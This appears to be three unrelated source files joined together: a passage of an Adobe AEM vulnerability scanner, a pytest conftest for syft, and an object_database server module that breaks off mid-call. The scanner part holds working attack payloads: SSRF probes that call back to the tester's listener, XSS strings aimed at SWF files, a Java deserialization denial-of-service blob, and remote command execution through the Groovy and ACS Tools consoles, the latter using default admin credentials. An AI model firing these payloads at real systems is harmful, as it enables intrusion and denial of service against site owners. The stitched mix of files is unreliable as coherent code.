';%0a{0}.png', ';%0a{0}.html', ';%0a{0}.ico', ';%0a{0}.png', '/{0}.ico', './{0}.html'
)
)
cache_buster = random_string()
MAKEREQUEST2 = list(pair[0].format(pair[1].format(cache_buster)) for pair in MAKEREQUEST2)
MAKEREQUEST3 = itertools.product(
(
'/libs/opensocial/makeRequest{0}?url={{0}}',
'///libs///opensocial///makeRequest{0}?url={{0}}'
),
(
'.{0}.css', '.{0}.js', '.{0}.png', '.{0}.ico', '.{0}.bmp', '.{0}.gif', '.{0}.html'
)
)
cache_buster = randint(1, 2**12)
MAKEREQUEST3 = list(pair[0].format(pair[1].format(cache_buster)) for pair in MAKEREQUEST3)
for path in itertools.chain(MAKEREQUEST1, MAKEREQUEST2, MAKEREQUEST3):
url = normalize_url(base_url, path)
encoded_orig_url = (base64.b16encode(url.encode())).decode()
back_url = 'http://{0}/{1}/opensocialmakerequest/{2}/'.format(my_host, token, encoded_orig_url)
url = url.format(back_url)
try:
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url}
data = 'httpMethod=GET'
http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy, debug=debug)
except:
if debug:
error('Exception while performing a check', check='ssrf_opensocial_makeRequest', url=url)
time.sleep(10)
if 'opensocialmakerequest' in d:
u = base64.b16decode(d.get('opensocialmakerequest')[0]).decode()
f = Finding('Opensocial (shindig) makeRequest', u,
                    'SSRF via Opensocial (shindig) makeRequest. You can specify the httpMethod, postData, headers and contentType parameters for makeRequest.')
results.append(f)
return results
@register('swf_xss')
def swf_xss(base_url, my_host, debug=False, proxy=None):
SWFS = (
'/etc/clientlibs/foundation/video/swf/player_flv_maxi.swf?onclick=javascript:confirm(document.domain)',
'/etc/clientlibs/foundation/video/swf/player_flv_maxi.swf.res?onclick=javascript:confirm(document.domain)',
'/etc/clientlibs/foundation/shared/endorsed/swf/slideshow.swf?contentPath=%5c"))%7dcatch(e)%7balert(document.domain)%7d//',
'/etc/clientlibs/foundation/shared/endorsed/swf/slideshow.swf.res?contentPath=%5c"))%7dcatch(e)%7balert(document.domain)%7d//',
'/etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf?javascriptCallbackFunction=alert(document.domain)-String',
'/etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf.res?javascriptCallbackFunction=alert(document.domain)-String',
'/libs/dam/widgets/resources/swfupload/swfupload_f9.swf?swf?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//',
'/libs/dam/widgets/resources/swfupload/swfupload_f9.swf.res?swf?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//',
'/libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//',
'/libs/cq/ui/resources/swfupload/swfupload.swf.res?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//',
'/etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf?stagesize=1&namespacePrefix=alert(document.domain)-window',
'/etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf.res?stagesize=1&namespacePrefix=alert(document.domain)-window',
'/etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf?loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain)%7dcatch(e)%7b%7d//',
'/etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf.res?loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain)%7dcatch(e)%7b%7d//',
'/etc/dam/viewers/s7sdk/3.2/flash/VideoPlayer.swf?stagesize=1&namespacePrefix=window[/aler/.source%2b/t/.source](document.domain)-window',
'/etc/dam/viewers/s7sdk/3.2/flash/VideoPlayer.swf.res?stagesize=1&namespacePrefix=window[/aler/.source%2b/t/.source](document.domain)-window'
)
results = []
for path in SWFS:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
ct = content_type(resp.headers.get('Content-Type', ''))
cd = resp.headers.get('Content-Disposition', '')
if resp.status_code == 200 and ct == 'application/x-shockwave-flash' and not cd:
f = Finding('Reflected XSS via SWF', url,
'AEM exposes SWF that might be vulnerable to reflected XSS. '
'See - https://speakerdeck.com/fransrosen/a-story-of-the-passive-aggressive-sysadmin-of-aem?slide=61')
results.append(f)
except:
if debug:
error('Exception while performing a check', check='swf_xss', url=url)
return results
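# --- Illustrative sketch (not part of the original tool) ---
# The swf_xss check only reports a finding when the SWF is served inline:
# HTTP 200, a Flash Content-Type, and no Content-Disposition header forcing a
# download. A minimal, hypothetical predicate expressing that rule (the real
# check uses the content_type() helper defined elsewhere in this script):
def example_swf_served_inline(status_code, headers):
    """Return True when an SWF response looks directly rendered by the browser."""
    mime = headers.get('Content-Type', '').split(';')[0].strip().lower()
    disposition = headers.get('Content-Disposition', '')
    return status_code == 200 and mime == 'application/x-shockwave-flash' and not disposition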
@register('externaljob_servlet')
def deser_externaljob_servlet(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
DESERPAYLOAD = base64.b64decode('rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cH////c=') # Generated with oisdos - java -Xmx25g -jar target/oisdos-1.0.jar ObjectArrayHeap
EXTERNALJOBSERVLET = itertools.product(('/libs/dam/cloud/proxy', '///libs///dam///cloud///proxy'),
('.json', '.css', '.js', '.html', '.ico', '.png', '.gif', '.1.json',
'...4.2.1...json', '.json;%0a{0}.css', '.json;%0a{0}.html', '.json;%0a{0}.ico'))
EXTERNALJOBSERVLET = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in EXTERNALJOBSERVLET)
results = []
for path in EXTERNALJOBSERVLET:
url = normalize_url(base_url, path)
data = {':operation': ('', 'job'), 'file': ('jobevent', DESERPAYLOAD, 'application/octet-stream')}
headers = {'Referer': base_url}
try:
resp = http_request_multipart(url, data=data, additional_headers=headers, proxy=proxy, debug=debug)
if resp.status_code == 500 and 'Java heap space' in str(resp.content):
f = Finding('ExternalJobServlet', url,
'ExternalJobServlet is vulnerable to Java untrusted data deserialization. '
'See - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=102')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='deser_externaljob_servlet', url=url)
return results
@register('webdav')
def exposed_webdav(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
WEBDAV = itertools.product(('/crx/repository/test', ),
('', '.json', '.css', '.html', '.ico',
';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico',
'/{0}.css', '/{0}.html', '/{0}.ico'))
WEBDAV = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in WEBDAV)
results = []
for path in WEBDAV:
try:
url = normalize_url(base_url, path)
resp = http_request(url, proxy=proxy, debug=debug)
www_authenticate = resp.headers.get('WWW-Authenticate', '').lower()
if resp.status_code == 401 and 'webdav' in www_authenticate:
f = Finding('WebDAV exposed', url,
                            'WebDAV might be vulnerable to CVE-2015-1833. Check it manually. '
'See - http://mail-archives.apache.org/mod_mbox/jackrabbit-announce/201505.mbox/raw/%[email protected]%3E/3')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_webdav', url=url)
return results
@register('groovy_console')
def exposed_groovy_console(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
SCRIPT = 'def%20command%20%3D%20%22whoami%22%0D%0Adef%20proc%20%3D%20command.execute%28%29%0D%0Aproc.waitFor%28%29%0D%0Aprintln%20%22%24%7Bproc.in.text%7D%22' # 'def+proc+%3d+"cat+/etc/passwd".execute()%0d%0aprintln+proc.text'
GROOVYSCRIPT1 = itertools.product(('/bin/groovyconsole/post.servlet', '///bin///groovyconsole///post.servlet'),
('', '.css', '.html', '.ico', '.json', '.1.json', '...4.2.1...json', ';%0a{0}.css',
';%0a{0}.html', ';%0a{0}.ico'))
GROOVYSCRIPT1 = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in GROOVYSCRIPT1)
GROOVYSCRIPT2 = itertools.product(('/etc/groovyconsole/jcr:content.html', '///etc///groovyconsole///jcr:content.html'),
('', '/{0}.css', '/{0}.html', '/{0}.ico', '/{0}.1.json', '/{0}...4.2.1...json',
';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico'))
GROOVYSCRIPT2 = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in GROOVYSCRIPT2)
GROOVYAUDIT = itertools.product(('/bin/groovyconsole/audit.servlet', '///bin///groovyconsole///audit.servlet'),
('', '.css', '.js', '.html', '.ico', '.png', '.json', '.1.json', '...4.2.1...json',
';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico'))
GROOVYAUDIT = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in GROOVYAUDIT)
results = []
for path in itertools.chain(GROOVYSCRIPT1, GROOVYSCRIPT2):
url = normalize_url(base_url, path)
data = 'script={}'.format(SCRIPT)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url}
try:
resp = http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy, debug=debug)
f = Finding('GroovyConsole', url, 'Groovy console is exposed, RCE is possible. '
'See - https://github.com/OlsonDigital/aem-groovy-console')
if resp.status_code == 200:
if 'executionResult' in str(resp.content):
results.append(f)
break
try:
json.loads(resp.content.decode())['output']
except:
pass
else:
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_groovy_console', url=url)
for path in GROOVYAUDIT:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200:
try:
json.loads(resp.content.decode())['data']
except:
pass
else:
f = Finding('GroovyConsole', url, 'Groovy console is exposed. '
'See - https://github.com/OlsonDigital/aem-groovy-console')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_groovy_console', url=url)
return results
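# --- Illustrative sketch (not part of the original tool) ---
# The SCRIPT constant above is URL-encoded Groovy that runs `whoami` and prints
# its output; decoding it makes the probe easy to review before sending:
import urllib.parse


def example_decode_groovy_script(encoded_script):
    """Return the human-readable Groovy source posted to the console servlet."""
    return urllib.parse.unquote(encoded_script)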
@register('acs_tools')
def exposed_acs_tools(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
DATA = 'scriptdata=%0A%3C%25%40+page+import%3D%22java.io.*%22+%25%3E%0A%3C%25+%0A%09Process+proc+%3D+Runtime.getRuntime().exec(%22echo+abcdef31337%22)%3B%0A%09%0A%09BufferedReader+stdInput+%3D+new+BufferedReader(new+InputStreamReader(proc.getInputStream()))%3B%0A%09StringBuilder+sb+%3D+new+StringBuilder()%3B%0A%09String+s+%3D+null%3B%0A%09while+((s+%3D+stdInput.readLine())+!%3D+null)+%7B%0A%09%09sb.append(s+%2B+%22%5C%5C%5C%5Cn%22)%3B%0A%09%7D%0A%09%0A%09String+output+%3D+sb.toString()%3B%0A%25%3E%0A%3C%25%3Doutput+%25%3E&scriptext=jsp&resource='
FIDDLE = itertools.product(
('/etc/acs-tools/aem-fiddle/_jcr_content.run.html', '/etc/acs-tools/aem-fiddle/_jcr_content.run...4.2.1...html'),
('', '/{0}.css', '/{0}.ico', '/a.png', '/{0}.json', '/{0}.1.json', '?{0}.css', '?{0}.ico'))
FIDDLE = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in FIDDLE)
PREDICATES = ('/bin/acs-tools/qe/predicates.json',)
results = []
for path in FIDDLE:
url = normalize_url(base_url, path)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url, 'Authorization': 'Basic YWRtaW46YWRtaW4='}
try:
resp = http_request(url, 'POST', data=DATA, additional_headers=headers, proxy=proxy, debug=debug)
if resp.status_code == 200 and 'abcdef31337' in str(resp.content):
f = Finding('ACSTools', url, 'ACS Tools Fiddle is exposed, RCE is possible. '
'See - https://adobe-consulting-services.github.io/acs-aem-tools/')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_acs_tools', url=url)
for path in PREDICATES:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200 and 'relativedaterange' in str(resp.content):
f = Finding('ACSTools', url, 'ACS Tools predicates. '
'See - https://adobe-consulting-services.github.io/acs-aem-tools/')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_acs_tools', url=url)
return results
def parse_args():
parser = argparse.ArgumentParser(description='AEM hacker by @0ang3el, see the slides - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps')
parser.add_argument('-u', '--url', help='url to scan')
parser.add_argument('--proxy', help='http and https proxy')
parser.add_argument('--debug', action='store_true', help='debug output')
parser.add_argument('--host', help='hostname or IP to use for back connections during SSRF detection')
    parser.add_argument('--port', type=int, default=80, help='port to open for the SSRF detection callback listener')
parser.add_argument('--workers', type=int, default=3, help='number of parallel workers')
parser.add_argument('-H', '--header', nargs='*', help='extra http headers to attach')
parser.add_argument('--handler', action='append', help='run specific handlers, if omitted run all handlers')
parser.add_argument('--listhandlers', action='store_true', help='list available handlers')
return parser.parse_args(sys.argv[1:])
def run_detector(port): # Run SSRF detector in separate thread
global token, d
handler = lambda *args: Detector(token, d, *args)
httpd = HTTPServer(('', port), handler)
t = Thread(target=httpd.serve_forever)
t.daemon = True
t.start()
return httpd
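# --- Illustrative sketch (not part of the original tool) ---
# The Detector handler used above is defined elsewhere in this script; its job
# is simply to split incoming back-connection paths of the form
# /<token>/<check-tag>/<hex-encoded-url>/ and record the encoded URL under the
# check tag in the shared dict `d`, which the checks read afterwards. A
# minimal, hypothetical handler with the same idea:
from http.server import BaseHTTPRequestHandler


class ExampleSSRFDetector(BaseHTTPRequestHandler):
    expected_token = ''   # set to the scan token before serving
    sink = {}             # check tag -> list of hex-encoded payload URLs (shared across requests)

    def do_GET(self):
        parts = [p for p in self.path.split('/') if p]
        if len(parts) >= 3 and parts[0] == self.expected_token:
            self.sink.setdefault(parts[1], []).append(parts[2])
        self.send_response(200)
        self.end_headers()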
def main():
global extra_headers
args = parse_args()
if args.listhandlers:
print('[*] Available handlers: {0}'.format(list(registered.keys())))
sys.exit(1337)
if args.proxy:
p = args.proxy
proxy = {'http': p, 'https': p}
else:
proxy = {}
if args.header:
for header in args.header:
            header_data = header.split(':', 1)  # split on the first ':' only so header values may themselves contain colons
extra_headers[header_data[0].strip()] = header_data[1].strip()
else:
extra_headers = {}
if not args.url:
print('You must specify the -u parameter, bye.')
sys.exit(1337)
if not args.host:
print('You must specify the --host parameter, bye.')
sys.exit(1337)
if not preflight(args.url, proxy):
        print('Seems that you provided a bad URL. Try another one, bye.')
sys.exit(1337)
httpd = run_detector(args.port)
handlers_to_run = registered.values()
if args.handler:
handlers_to_run = []
for name in args.handler:
handler_func = registered.get(name)
if handler_func:
handlers_to_run.append(handler_func)
with concurrent.futures.ThreadPoolExecutor(args.workers) as tpe:
futures = []
for check in handlers_to_run:
my_host = '{0}:{1}'.format(args.host, args.port)
futures.append(tpe.submit(check, args.url, my_host, args.debug, proxy))
for future in concurrent.futures.as_completed(futures):
for finding in future.result():
print('[+] New Finding!!!')
print('\tName: {}'.format(finding.name))
print('\tUrl: {}'.format(finding.url))
print('\tDescription: {}\n\n'.format(finding.description))
httpd.shutdown()
if __name__ == '__main__':
main()
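# --- Usage note (not part of the original tool) ---
# Based on the argument parser above, a typical invocation looks roughly like
# the following (script name and hosts are placeholders):
#
#   python3 <this-script>.py -u https://target.example.com \
#       --host <callback-host-or-ip> --port 80 --workers 3 --debug
#
# --host/--port must point at a listener reachable from the target, since the
# SSRF checks only produce findings when a back connection is received.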
|
conftest.py
|
# stdlib
import logging
from multiprocessing import Process
import socket
from time import time
from typing import Any as TypeAny
from typing import Callable as TypeCallable
from typing import Dict as TypeDict
from typing import Generator
from typing import List as TypeList
# third party
import _pytest
import pytest
# syft absolute
import syft as sy
from syft import logger
from syft.grid.example_nodes.network import signaling_server as start_signaling_server
from syft.lib import VendorLibraryImportException
from syft.lib import _load_lib
from syft.lib import vendor_requirements_available
# relative
from .syft.notebooks import free_port
logger.remove()
@pytest.fixture(scope="session")
def signaling_server() -> Generator:
port = free_port()
proc = Process(target=start_signaling_server, args=(port, "127.0.0.1"))
proc.start()
start = time()
while time() - start < 15:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
if s.connect_ex(("127.0.0.1", port)) == 0:
break
else:
raise TimeoutError("Can't connect to the signaling server")
yield port
proc.terminate()
@pytest.fixture
def caplog(caplog: _pytest.logging.LogCaptureFixture) -> Generator:
class PropogateHandler(logging.Handler):
def emit(self, record: logging.LogRecord) -> None:
logging.getLogger(record.name).handle(record)
logger.add(PropogateHandler())
yield caplog
logger.remove()
def pytest_addoption(parser: _pytest.config.argparsing.Parser) -> None:
parser.addoption(
"--runslow", action="store_true", default=False, help="run slow tests"
)
def pytest_configure(config: _pytest.config.Config) -> None:
config.addinivalue_line("markers", "slow: mark test as slow to run")
config.addinivalue_line("markers", "fast: mark test as fast to run")
config.addinivalue_line("markers", "all: all tests")
config.addinivalue_line("markers", "asyncio: mark test as asyncio")
config.addinivalue_line("markers", "vendor: mark test as vendor library")
config.addinivalue_line("markers", "libs: runs valid vendor tests")
config.addinivalue_line("markers", "benchmark: runs benchmark tests")
config.addinivalue_line("markers", "torch: runs torch tests")
config.addinivalue_line("markers", "duet: runs duet notebook integration tests")
config.addinivalue_line("markers", "grid: runs grid tests")
def pytest_collection_modifyitems(
config: _pytest.config.Config, items: TypeList[TypeAny]
) -> None:
# $ pytest -m fast for the fast tests
# $ pytest -m slow for the slow tests
# $ pytest -m all for all the tests
# $ pytest -m libs for the vendor tests
slow_tests = pytest.mark.slow
fast_tests = pytest.mark.fast
duet_tests = pytest.mark.duet
grid_tests = pytest.mark.grid
all_tests = pytest.mark.all
# dynamically filtered vendor lib tests
# there isn't any way to remove "vendor" so the only way to filter
# these tests is to add a different tag called "libs" and then run
# the tests against that dynamic keyword
vendor_tests = pytest.mark.libs # note libs != vendor
loaded_libs: TypeDict[str, bool] = {}
vendor_skip = pytest.mark.skip(reason="vendor requirements not met")
for item in items:
if item.location[0].startswith("PyGrid"):
# Ignore if PyGrid folder checked out in main dir
continue
if "grid" in item.keywords:
item.add_marker(grid_tests)
continue
# mark with: pytest.mark.vendor
# run with: pytest -m libs -n auto 0
if "vendor" in item.keywords:
vendor_requirements = item.own_markers[0].kwargs
# try to load the lib first and if it fails just skip
if "lib" in vendor_requirements:
lib_name = vendor_requirements["lib"]
if lib_name not in loaded_libs:
try:
_load_lib(lib=lib_name)
loaded_libs[lib_name] = True
except Exception as e:
print(f"Failed to load {lib_name}. {e}")
loaded_libs[lib_name] = False
if not loaded_libs[lib_name]:
item.add_marker(vendor_skip)
continue
try:
# test the vendor requirements of the specific test if the library
# was loaded successfully
if vendor_requirements_available(
vendor_requirements=vendor_requirements
):
if item.location[0].startswith("tests/syft/notebooks"):
item.add_marker(duet_tests)
else:
item.add_marker(vendor_tests)
item.add_marker(all_tests)
except VendorLibraryImportException as e:
print(e)
except Exception as e:
print(f"Unable to check vendor library: {vendor_requirements}. {e}")
continue
if "benchmark" in item.keywords:
continue
if "torch" in item.keywords:
item.add_marker(all_tests)
continue
item.add_marker(all_tests)
if "slow" in item.keywords:
item.add_marker(slow_tests)
else:
if item.location[0].startswith("tests/syft/notebooks"):
item.add_marker(duet_tests)
continue
# fast is the default catch all
item.add_marker(fast_tests)
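# --- Illustrative note (not part of the original test suite) ---
# Based on the hook above, a vendor-library test is expected to carry a
# pytest.mark.vendor marker with a `lib` keyword naming the package; the hook
# loads that library once, re-tags the test with the dynamic "libs" marker and
# skips it when the requirements are missing. A minimal, hypothetical example
# (the library name below is only a placeholder):
#
#   @pytest.mark.vendor(lib="some_vendor_lib")
#   def test_some_vendor_feature() -> None:
#       ...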
@pytest.fixture(scope="session")
def node() -> sy.VirtualMachine:
return sy.VirtualMachine(name="Bob")
@pytest.fixture(autouse=True)
def node_store(node: sy.VirtualMachine) -> None:
node.store.clear()
@pytest.fixture(scope="session")
def client(node: sy.VirtualMachine) -> sy.VirtualMachineClient:
return node.get_client()
@pytest.fixture(scope="session")
def root_client(node: sy.VirtualMachine) -> sy.VirtualMachineClient:
return node.get_root_client()
# The unit tests require separate VM's as we have a common crypto store cache.
# TODO: The dependency should be modified to use common VM's
@pytest.fixture
def get_clients() -> TypeCallable[[int], TypeList[TypeAny]]:
def _helper_get_clients(nr_clients: int) -> TypeList[TypeAny]:
clients = [
sy.VirtualMachine(name=f"P_{i}").get_root_client()
for i in range(nr_clients)
]
return clients
return _helper_get_clients
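# --- Usage note (not part of the original test suite) ---
# The session-scoped `node`, `client` and `root_client` fixtures share a single
# VirtualMachine whose store is cleared before every test by `node_store`,
# while `get_clients` builds fresh VMs so crypto-store state stays isolated.
# A hypothetical test using it:
#
#   def test_with_three_parties(get_clients) -> None:
#       alice, bob, carol = get_clients(3)
#       ...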
|
server.py
|
# Copyright 2018 Braxton Mckee
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from object_database.messages import ClientToServer, ServerToClient
from object_database.identity import IdentityProducer
from object_database.messages import SchemaDefinition
from object_database.core_schema import core_schema
import object_database.keymapping as keymapping
from object_database.util import Timer
from typed_python import *
import queue
import time
import logging
import threading
import traceback
DEFAULT_GC_INTERVAL = 900.0
class ConnectedChannel:
def __init__(self, initial_tid, channel, connectionObject, identityRoot):
super(ConnectedChannel, self).__init__()
self.channel = channel
self.initial_tid = initial_tid
self.connectionObject = connectionObject
self.missedHeartbeats = 0
self.definedSchemas = {}
self.subscribedTypes = {} # schema, type to the lazy transaction id (or -1 if not lazy)
self.subscribedIds = set() # identities
self.subscribedIndexKeys = {} # full index keys to lazy transaction id
self.identityRoot = identityRoot
self.pendingTransactions = {}
self._needsAuthentication = True
@property
def needsAuthentication(self):
return self._needsAuthentication
def authenticate(self):
self._needsAuthentication = False
def heartbeat(self):
self.missedHeartbeats = 0
def sendTransaction(self, msg):
# we need to cut the transaction down
self.channel.write(msg)
def sendInitializationMessage(self):
self.channel.write(
ServerToClient.Initialize(
transaction_num=self.initial_tid,
connIdentity=self.connectionObject._identity,
identity_root=self.identityRoot
)
)
def sendTransactionSuccess(self, guid, success, badKey):
self.channel.write(
ServerToClient.TransactionResult(transaction_guid=guid, success=success, badKey=badKey)
)
def handleTransactionData(self, msg):
guid = msg.transaction_guid
if guid not in self.pendingTransactions:
self.pendingTransactions[guid] = {
'writes': {},
'set_adds': {},
'set_removes': {},
'key_versions': set(),
'index_versions': set()
}
self.pendingTransactions[guid]['writes'].update({k: msg.writes[k] for k in msg.writes})
self.pendingTransactions[guid]['set_adds'].update({k: set(msg.set_adds[k]) for k in msg.set_adds if msg.set_adds[k]})
self.pendingTransactions[guid]['set_removes'].update({k: set(msg.set_removes[k]) for k in msg.set_removes if msg.set_removes[k]})
self.pendingTransactions[guid]['key_versions'].update(msg.key_versions)
self.pendingTransactions[guid]['index_versions'].update(msg.index_versions)
def extractTransactionData(self, guid):
return self.pendingTransactions.pop(guid)
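# --- Illustrative sketch (not part of the original module) ---
# A client streams a large transaction as several TransactionData messages
# followed by CompleteTransaction. handleTransactionData above merges each
# chunk into pendingTransactions[guid], and extractTransactionData pops the
# accumulated dict when the commit message arrives. A minimal, hypothetical
# restatement of that per-chunk merge on plain dicts:
def example_merge_transaction_chunk(pending, writes, set_adds, set_removes):
    """Merge one streamed chunk into the accumulated pending-transaction state."""
    pending['writes'].update(writes)
    pending['set_adds'].update({k: set(v) for k, v in set_adds.items() if v})
    pending['set_removes'].update({k: set(v) for k, v in set_removes.items() if v})
    return pending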
class Server:
def __init__(self, kvstore, auth_token):
self._kvstore = kvstore
self._auth_token = auth_token
self._lock = threading.RLock()
self.verbose = False
self._gc_interval = DEFAULT_GC_INTERVAL
self._removeOldDeadConnections()
# InMemoryChannel or ServerToClientProtocol -> ConnectedChannel
self._clientChannels = {}
# id of the next transaction
self._cur_transaction_num = 0
# for each key, the last version number we committed
self._version_numbers = {}
self._version_numbers_timestamps = {}
# (schema,type) to set(subscribed channel)
self._type_to_channel = {}
# index-stringname to set(subscribed channel)
self._index_to_channel = {}
# for each individually subscribed ID, a set of channels
self._id_to_channel = {}
self.longTransactionThreshold = 1.0
self.logFrequency = 10.0
self.MAX_NORMAL_TO_SEND_SYNCHRONOUSLY = 1000
self.MAX_LAZY_TO_SEND_SYNCHRONOUSLY = 10000
self._transactions = 0
self._keys_set = 0
self._index_values_updated = 0
self._subscriptions_written = 0
self._subscriptionResponseThread = None
self._shouldStop = threading.Event()
# a queue of queue-subscription messages. we have to handle
# these on another thread because they can be quite large, and we don't want
# to prevent message processing on the main thread.
self._subscriptionQueue = queue.Queue()
# if we're building a subscription up, all the objects that have changed while our
# lock was released.
self._pendingSubscriptionRecheck = None
# fault injector to test this thing
self._subscriptionBackgroundThreadCallback = None
self._lazyLoadCallback = None
self._last_garbage_collect_timestamp = None
self.identityProducer = IdentityProducer(self.allocateNewIdentityRoot())
self._logger = logging.getLogger(__name__)
def start(self):
self._subscriptionResponseThread = threading.Thread(target=self.serviceSubscriptions)
self._subscriptionResponseThread.daemon = True
self._subscriptionResponseThread.start()
def stop(self):
self._shouldStop.set()
self._subscriptionQueue.put((None, None))
self._subscriptionResponseThread.join()
def allocateNewIdentityRoot(self):
with self._lock:
curIdentityRoot = self._kvstore.get(" identityRoot")
if curIdentityRoot is None:
curIdentityRoot = 0
else:
curIdentityRoot = deserialize(int, bytes.fromhex(curIdentityRoot))
result = curIdentityRoot
self._kvstore.set(" identityRoot", serialize(int, curIdentityRoot+1).hex())
return result
def serviceSubscriptions(self):
while not self._shouldStop.is_set():
try:
try:
(connectedChannel, msg) = self._subscriptionQueue.get(timeout=1.0)
if connectedChannel is not None:
self.handleSubscriptionOnBackgroundThread(connectedChannel, msg)
except queue.Empty:
pass
except Exception:
self._logger.error("Unexpected error in serviceSubscription thread:\n%s", traceback.format_exc())
def _removeOldDeadConnections(self):
connection_index = keymapping.index_key(core_schema.Connection, " exists", True)
        oldIds = self._kvstore.getSetMembers(connection_index)
if oldIds:
self._kvstore.setSeveral(
{keymapping.data_key(core_schema.Connection, identity, " exists"): None for identity in oldIds},
{},
{connection_index: set(oldIds)}
)
def checkForDeadConnections(self):
with self._lock:
heartbeatCount = {}
for c in list(self._clientChannels):
missed = self._clientChannels[c].missedHeartbeats
self._clientChannels[c].missedHeartbeats += 1
heartbeatCount[missed] = heartbeatCount.get(missed, 0) + 1
if missed >= 4:
self._logger.info(
"Connection %s has not heartbeat in a long time. Killing it.",
self._clientChannels[c].connectionObject._identity
)
c.close()
self.dropConnection(c)
self._logger.debug("Connection heartbeat distribution is %s", heartbeatCount)
def dropConnection(self, channel):
with self._lock:
if channel not in self._clientChannels:
                self._logger.warn('Tried to drop a nonexistent channel')
return
connectedChannel = self._clientChannels[channel]
for schema_name, typename in connectedChannel.subscribedTypes:
self._type_to_channel[schema_name, typename].discard(connectedChannel)
for index_key in connectedChannel.subscribedIndexKeys:
self._index_to_channel[index_key].discard(connectedChannel)
if not self._index_to_channel[index_key]:
del self._index_to_channel[index_key]
for identity in connectedChannel.subscribedIds:
if identity in self._id_to_channel:
self._id_to_channel[identity].discard(connectedChannel)
if not self._id_to_channel[identity]:
del self._id_to_channel[identity]
co = connectedChannel.connectionObject
self._logger.info("Server dropping connection for connectionObject._identity = %s", co._identity)
del self._clientChannels[channel]
self._dropConnectionEntry(co)
def _createConnectionEntry(self):
identity = self.identityProducer.createIdentity()
exists_key = keymapping.data_key(core_schema.Connection, identity, " exists")
exists_index = keymapping.index_key(core_schema.Connection, " exists", True)
identityRoot = self.allocateNewIdentityRoot()
self._handleNewTransaction(
None,
{exists_key: serialize(bool, True).hex()},
{exists_index: set([identity])},
{},
[],
[],
self._cur_transaction_num
)
return core_schema.Connection.fromIdentity(identity), identityRoot
def _dropConnectionEntry(self, entry):
identity = entry._identity
exists_key = keymapping.data_key(core_schema.Connection, identity, " exists")
exists_index = keymapping.index_key(core_schema.Connection, " exists", True)
self._handleNewTransaction(
None,
{exists_key: None},
{},
{exists_index: set([identity])},
[],
[],
self._cur_transaction_num
)
def addConnection(self, channel):
try:
with self._lock:
connectionObject, identityRoot = self._createConnectionEntry()
connectedChannel = ConnectedChannel(
self._cur_transaction_num,
channel,
connectionObject,
identityRoot
)
self._clientChannels[channel] = connectedChannel
channel.setClientToServerHandler(
lambda msg: self.onClientToServerMessage(connectedChannel, msg)
)
connectedChannel.sendInitializationMessage()
except Exception:
self._logger.error(
"Failed during addConnection which should never happen:\n%s",
traceback.format_exc()
)
def _handleSubscriptionInForeground(self, channel, msg):
# first see if this would be an easy subscription to handle
with Timer("Handle subscription in foreground: %s/%s/%s/isLazy=%s over %s",
msg.schema, msg.typename, msg.fieldname_and_value, msg.isLazy, lambda: len(identities)):
typedef, identities = self._parseSubscriptionMsg(channel, msg)
if not (msg.isLazy and len(identities) < self.MAX_LAZY_TO_SEND_SYNCHRONOUSLY or len(identities) < self.MAX_NORMAL_TO_SEND_SYNCHRONOUSLY):
self._subscriptionQueue.put((channel, msg))
return
# handle this directly
if msg.isLazy:
self._completeLazySubscription(
msg.schema, msg.typename, msg.fieldname_and_value,
typedef,
identities,
channel
)
return
self._sendPartialSubscription(
channel,
msg.schema,
msg.typename,
msg.fieldname_and_value,
typedef,
identities,
set(identities),
BATCH_SIZE=None,
